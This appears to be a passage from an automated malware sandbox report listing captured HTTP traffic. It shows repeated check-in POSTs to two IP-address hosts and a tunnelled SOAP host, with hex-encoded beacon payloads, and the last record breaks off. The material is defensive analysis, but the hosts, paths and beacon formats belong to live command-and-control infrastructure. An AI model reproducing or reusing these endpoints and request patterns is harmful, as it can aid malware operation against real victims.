Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings" Host: b-stamps.gl.at.ply.gg:30946 Content-Length: 144 Expect: 100-continue Accept-Encoding: gzip, deflate
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: b-stamps.gl.at.ply.gg:30946Content-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: 